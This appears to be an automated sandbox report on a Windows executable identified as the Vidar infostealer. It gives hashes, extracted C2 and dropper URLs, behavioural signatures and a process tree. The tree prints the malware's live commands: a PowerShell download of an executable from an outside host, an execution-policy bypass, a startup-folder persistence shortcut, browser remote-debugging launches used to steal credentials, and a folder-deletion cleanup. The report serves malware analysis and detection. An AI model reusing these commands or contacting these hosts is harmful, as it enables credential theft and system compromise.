Overview

overview

10

Static

static

5

6a97f99224...b6.exe

windows7-x64

8

6a97f99224...b6.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    138s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/11/2024, 04:10

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    6a97f99224f349c28c6c4c8a3f2ecfb6.exe

  • Size

    1.2MB

  • MD5

    6a97f99224f349c28c6c4c8a3f2ecfb6

  • SHA1

    64c0eac737f4f294e50d64d7ded5896e4d36b2e7

  • SHA256

    c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480

  • SHA512

    370836b122778b34ac8804012781f1b1d274864977a537993b8efba9cc8d7f8b526d7ed9774d65a8311b556133f1c914a4f5d89421c4a4ee181278ddfd4639a0

  • SSDEEP

    24576:0rORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvaj1h9XCrd:02EYTb8atv1orq+pEiSDTj1VyvBaJSR

Score
10/10
vidarcredential_accessdiscoveryexecutionspywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://my.cloudme.com/v1/ws2/:excellent2024/:stars/stars.txt

Extracted

Family

vidar

C2

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Signatures

  • Detect Vidar Stealer 17 IoCs
    stealer
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 60 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3488
      • C:\Users\Admin\AppData\Local\Temp\6a97f99224f349c28c6c4c8a3f2ecfb6.exe
        "C:\Users\Admin\AppData\Local\Temp\6a97f99224f349c28c6c4c8a3f2ecfb6.exe"
        2⤵
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:excellent2024/:stars_1/stars" -OutFile "C:\Users\Public\Guard.exe""
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Users\Public\Guard.exe
            "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
            4⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2232
      • C:\Windows\SysWOW64\cmd.exe
        cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
        2⤵
        • Drops startup file
        • System Location Discovery: System Language Discovery
        PID:376
      • C:\Users\Public\jsc.exe
        C:\Users\Public\jsc.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
            PID:4852
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:4436
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • Checks computer location settings
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3436
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                4⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:3588
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffc234cc40,0x7fffc234cc4c,0x7fffc234cc58
                  5⤵
                    PID:2792
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2
                    5⤵
                      PID:508
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1840,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2576 /prefetch:3
                      5⤵
                        PID:1160
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2140,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2592 /prefetch:8
                        5⤵
                          PID:3840
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:2368
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3464 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:2332
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4252,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:804
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:8
                          5⤵
                            PID:3192
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:8
                            5⤵
                              PID:404
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:8
                              5⤵
                                PID:4812
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4912,i,1029984843185295023,28066400876611365,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
                                5⤵
                                  PID:836
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                4⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:3832
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc23546f8,0x7fffc2354708,0x7fffc2354718
                                  5⤵
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5108
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                  5⤵
                                    PID:4320
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                    5⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4116
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8
                                    5⤵
                                      PID:4452
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:3312
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:4996
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:1776
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:1068
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
                                      5⤵
                                        PID:4460
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2036 /prefetch:2
                                        5⤵
                                          PID:2404
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2536 /prefetch:2
                                          5⤵
                                            PID:3084
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3992 /prefetch:2
                                            5⤵
                                              PID:1448
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3928 /prefetch:2
                                              5⤵
                                                PID:1964
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,1899084739389902855,8447111437257034779,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3444 /prefetch:2
                                                5⤵
                                                  PID:2280
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IDBAKKECAEGC" & exit
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3696
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 10
                                                  5⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:4484
                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                          1⤵
                                            PID:4928
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                            1⤵
                                              PID:1364

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\ProgramData\chrome.dll
                                              Filesize

                                              676KB

                                              MD5

                                              eda18948a989176f4eebb175ce806255

                                              SHA1

                                              ff22a3d5f5fb705137f233c36622c79eab995897

                                              SHA256

                                              81a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4

                                              SHA512

                                              160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85

                                              Download Submit

                                            • C:\ProgramData\mozglue.dll
                                              Filesize

                                              593KB

                                              MD5

                                              c8fd9be83bc728cc04beffafc2907fe9

                                              SHA1

                                              95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                              SHA256

                                              ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                              SHA512

                                              fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                              Download Submit

                                            • C:\ProgramData\nss3.dll
                                              Filesize

                                              2.0MB

                                              MD5

                                              1cc453cdf74f31e4d913ff9c10acdde2

                                              SHA1

                                              6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                              SHA256

                                              ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                              SHA512

                                              dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                              Filesize

                                              649B

                                              MD5

                                              c09d8671f888fec752e71f46685681da

                                              SHA1

                                              c7cb03fbcf280a3ffcda29629f4d7acb1dd0c8f5

                                              SHA256

                                              cbee095338ae788375e9d3adde79ebacb7798ccb8429df3add6415ebce36c5ce

                                              SHA512

                                              faf7bbe8bf6c43954ad8af490b93e94106bd823b9a82a9fbf51b7a89c4c722108267d32df33ae90ab2c19fee6a46585364839430a930c0f46daafc467d2ca20f

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                              Filesize

                                              2B

                                              MD5

                                              d751713988987e9331980363e24189ce

                                              SHA1

                                              97d170e1550eee4afc0af065b78cda302a97674c

                                              SHA256

                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                              SHA512

                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                              Filesize

                                              2KB

                                              MD5

                                              2f57fde6b33e89a63cf0dfdd6e60a351

                                              SHA1

                                              445bf1b07223a04f8a159581a3d37d630273010f

                                              SHA256

                                              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                              SHA512

                                              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0dd496a6-85f9-4e2f-8186-a0203d21e84b.dmp
                                              Filesize

                                              818KB

                                              MD5

                                              ee3c49d4569e1704fc662b6c5f15e0f5

                                              SHA1

                                              cbfa4ba2598fa987f5d839981071bdf9f477d11b

                                              SHA256

                                              3cdd1169585225bdc00a78f5518be14b3f347df3cb3f3632419351a420aa1eb0

                                              SHA512

                                              d6f86a28c94340df756c277ab3bd9645018805b189a351b303b23b2df2508879edb19ccb83e21ad095a740f85949c19f051718141e48a61f9f54a46fad7ee6fe

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\27196b95-23a5-413e-81bd-922c76f68ef1.dmp
                                              Filesize

                                              834KB

                                              MD5

                                              69be940cb4660f9959d002b11e6e9f28

                                              SHA1

                                              5785c012aa5b3d9c7dc99b580969e47275533762

                                              SHA256

                                              228a9ff28faaeaeb12c181d904d28e98b74dfe71d029c5b27917c3ae428d13af

                                              SHA512

                                              2621eaa5762d06fa82fe112b5cda318356c4ee158a9ed63487f8dbfde30e12799a12e6a27625ed75bdfcf492785ba42251ef056446d82e4067092db01962f24d

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5f922cc6-18c7-4e04-8c94-03aec36df31b.dmp
                                              Filesize

                                              834KB

                                              MD5

                                              5c12bee08fcefcf61300cc68a448ab0b

                                              SHA1

                                              9a03e192650a18b7eedfaff81de49a4d89359b14

                                              SHA256

                                              dfd1a5a766dbb723bf8c543861c3e40ce04ca34d4e260dd6479ca8e0a40e016b

                                              SHA512

                                              2bf615071785033a3d1484078e2b9fcab640db90bd074474d6b8d5490e43bc7c37aef8ea5b70a0239efeeed81550bd9902f335b091620a5f8d1c83be3ae5757f

                                              Download Submit

                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8df35486-198f-4169-ab43-ce8517f5a39b.dmp
                                              Filesize

                                              826KB

                                              MD5

                                              88cbdf28442099b68f120cd6eff2cebf

                                              SHA1

                                              e16b0289ef5cc22e65ac35a7189fbeda9c6e79e1

                                              SHA256

                                              8502e22b855e0c7e0c97e212747fc20573748c66d3fcf586235c6393e50ec859

                                              SHA512

                                              42f736e2f8e2f8642e0828b0a6353cc08720c9ed7fc32dc843f0910411039bd66ec9344661d190ec914011f1a7aaebf7ff4a04824cb6febf4e0884ae22001197

                                              Download Submit

